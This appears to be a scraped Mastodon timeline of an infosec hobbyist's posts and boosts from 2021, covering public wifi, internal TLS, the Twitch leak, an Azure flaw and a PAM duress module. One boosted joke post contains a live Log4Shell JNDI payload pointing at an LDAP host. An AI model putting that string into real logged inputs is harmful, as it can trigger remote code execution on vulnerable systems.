**r000t** @r000t@infosec.exchange · Dec 15, 2021, 10:36

**r000t** @r000t@infosec.exchange · Dec 15, 2021, 10:36

r000t @r000t@infosec.exchange

r000t @r000t@infosec.exchange

1.45K Posts

14 Following

276 Followers

Discord: r000t#0001

Website: https://r000t.com/

XMPP: r000t@xmpp.is

Shitposting: @r000t@ligma.pro

Hacker, comedian, RED Scout fan, gold Ekko one-trick. Watching them sorting debris.

Joined Aug 2018

14 Following 276 Followers

Posts Posts and replies Media

Dec 15, 2021, 10:36

r000t @r000t@infosec.exchange

Hot take: "public wifi is bad, you *will* get owned if you use it" is outdated advice, especially given that TLS is now considered mandatory, not just "standard"

The VPNs being sold with this outdated advice are statistically more likely to be a security threat than your coffeeshop's wifi

**r000t** · Dec 11, 2021, 14:05

r000t boosted

**Sasha Sorokin 🏳‍🌈** @sasha_sorokin@mastodon.social · Dec 11, 2021, 14:05

Dec 11, 2021, 14:05

Sasha Sorokin 🏳‍🌈 @sasha_sorokin@mastodon.social

good morning my fellow java developers

I wish you a very ${jndi:ldap://192.168.15.69:1420/a}

**r000t** · Dec 07, 2021, 09:08

r000t boosted

**a1ba-nyan** @a1ba@expired.mentality.rip · Dec 07, 2021, 09:08

Dec 07, 2021, 09:08

a1ba-nyan @a1ba@expired.mentality.rip

174781ad70097a2a04e5fc1dd8ac938fac013f258ba71868a918b7ca71268eec.png?name=%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png

**r000t** · Dec 06, 2021, 23:42

r000t boosted

**GNU/r000t** @r000t@ligma.pro · Dec 06, 2021, 23:42

Dec 06, 2021, 23:42

GNU/r000t @r000t@ligma.pro

Help me prove a point to a colleague:

If your corporate computer (or school computer, or pretend you work for a place that issues computers) normally asks you to press ctrl+alt+del before logging on:

1) Would you ever notice if you *weren't* asked to do that, just once?

2) If you did notice, what would you do?

**r000t** · Nov 22, 2021, 16:12

r000t boosted

**VOLTUR** @voltur@hackers.town · Nov 22, 2021, 16:12

Nov 22, 2021, 16:12

VOLTUR @voltur@hackers.town

Tired: Thanksgiving
Wired: Harvest festivals
Inspired: Credential Harvesting Festivals

**r000t** @r000t@infosec.exchange · Oct 22, 2021, 17:58

**r000t** @r000t@infosec.exchange · Oct 22, 2021, 17:58

Oct 22, 2021, 17:58

r000t @r000t@infosec.exchange

Selling educational materials for educational purposes only is still legal. Just saiyan.

Alternatively, giving away cyberattack tools is based and GNUpilled

0a208525c21d3e2e.png

**r000t** · Oct 10, 2021, 15:11

r000t boosted

**a1ba-nyan** @a1ba@expired.mentality.rip · Oct 10, 2021, 15:11

Oct 10, 2021, 15:11

a1ba-nyan @a1ba@expired.mentality.rip

428b8db964875f71089d44c7230d8c5aa0db7d0d46d639264ebaa7a66ddb48a7.jpg?name=Husky%20Test_1633878677410_R7ZA169FUE.jpg

**r000t** · Oct 07, 2021, 19:48

r000t boosted

**GnoSyZ (classical edition)** @ZySoua@mastodon.ml · Oct 07, 2021, 19:48

Oct 07, 2021, 19:48

GnoSyZ (classical edition) @ZySoua@mastodon.ml

Time Magazine cover in 2010th and now future cover of October TIME Magazine cover
Time to die, Mark

71a77045cfe46ed1.png

**r000t** @r000t@infosec.exchange · Oct 06, 2021, 12:24

**r000t** @r000t@infosec.exchange · Oct 06, 2021, 12:24

Oct 06, 2021, 12:24

r000t @r000t@infosec.exchange

Twitch pwnt. 120+GB of data leaked.

393e91228e1663f5.png

**r000t** @r000t@infosec.exchange · Aug 31, 2021, 12:32

**r000t** @r000t@infosec.exchange · Aug 31, 2021, 12:32

Aug 31, 2021, 12:32

r000t @r000t@infosec.exchange

@feonixrift
Internal certs, internal CA.

**r000t** @r000t@infosec.exchange · Aug 31, 2021, 10:43

**r000t** @r000t@infosec.exchange · Aug 31, 2021, 10:43

Aug 31, 2021, 10:43

r000t @r000t@infosec.exchange

YOUR
INTERNAL
SERVICES
STILL
NEED
TLS

YOUR
LAN
SHOULD
BE
ASSUMED
TO
BE
HOSTILE

**r000t** · Aug 29, 2021, 19:46

r000t boosted

**(RTP)Privacy & Tech Tips** @RTP@fosstodon.org · Aug 29, 2021, 19:46

Aug 29, 2021, 19:46

(RTP)Privacy & Tech Tips @RTP@fosstodon.org

"Worst cloud vulnerability possible discovered in Microsoft Azure..." Granting read/write access to every database on the service.
#Infosec #News #Vulnerability #Cybersecurity #TheCloud #Cloud #Microsoft #Azure

https://arstechnica.com/information-technology/2021/08/worst-cloud-vulnerability-you-can-imagine-discovered-in-microsoft-azure/

**r000t** @r000t@infosec.exchange · Aug 23, 2021, 20:26

**r000t** @r000t@infosec.exchange · Aug 23, 2021, 20:26

Aug 23, 2021, 20:26

r000t @r000t@infosec.exchange

pam-duress: A Pluggable Authentication Module (PAM) which allows the establishment of alternate passwords that can be used to perform actions to clear sensitive data, notify IT/Security staff, close off sensitive network connections, etc if a user is coerced into giving a threat actor a password.

https://github.com/nuvious/pam-duress

d62fbbb72b6aead7.png

**r000t** · Jul 16, 2021, 18:32

r000t boosted

**Rob Vincent 🎙️💅** @Rob_T_Firefly@hackers.town · Jul 16, 2021, 18:32

Jul 16, 2021, 18:32

Rob Vincent 🎙️💅 @Rob_T_Firefly@hackers.town

A "podcast" behind a paywall is not a podcast.

A "podcast" that only one app can receive is not a podcast.

A "podcast" without a public feed that can be freely pulled into any podcast client or RSS reader is not a damn podcast, don't let people get away with calling it that.